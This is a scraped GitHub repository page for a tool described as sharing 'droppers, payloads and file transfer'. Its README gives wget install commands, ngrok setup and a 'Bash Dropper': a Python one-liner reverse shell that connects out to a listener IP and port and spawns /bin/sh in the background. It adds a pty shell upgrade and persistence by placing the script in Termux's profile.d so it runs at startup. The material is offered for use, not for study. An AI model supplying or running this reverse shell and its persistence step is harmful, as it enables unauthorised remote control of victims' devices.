Skip to content
/ efxshare Public

Sharing quick droppers, payloads and file transfer at high speed

Notifications You must be signed in to change notification settings

efxtv/efxshare

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 

Repository files navigation

EFXSHARE

Sharing quick droppers, payloads and file transfer at high speed

EFX SHARE SETUP

Setup in Termux

 wget https://github.com/efxtv/efxshare/raw/main/termux/efxshare;mv efxshare /data/data/com.termux/files/usr/bin/;chmod +x /data/data/com.termux/files/usr/bin/efxshare 

Stup in Ubuntu/Kali/Debian
 wget https://github.com/efxtv/efxshare/raw/main/others/efxshare;sudo mv efxshare /usr/bin/;sudo chmod +x /usr/bin/efxshare 

Setup NGROK Go to https://ngrok.com/
Login with real email id, do not use temp email. It can reduce the speed and connectivity strength.
Verify your email addres by logging in to the email.
Download the file, by clicking on it (do not wget specially for termux). Once you visit the site you have to click on the button as shown below.
EFX TV

Unzip the downloaded file
unzip filename.zip


Verify the auth tocken. For that you need to wath the video will be shared soon.

Bash Dropper file which runs in background

Copy the text below and save it as run.sh or some other name. Change the ip port as shown in video.
export RHOST="192.168.1.37";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' &

Start the listener in your host machine and execute the file run.sh to the terminal. It will start tunning in background. Even if you close the terminal it will keep running. This bash session will be more beautiful if you pace the command in the terminal after getting reverse connection.
python -c 'import pty;pty.spawn("/bin/bash")'
Want access with boot?
Drop the file run.sh in the locations:


For termux

 /data/data/com.termux/files/usr/etc/profile.d 

For Ubuntu and others ****


About

Sharing quick droppers, payloads and file transfer at high speed

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published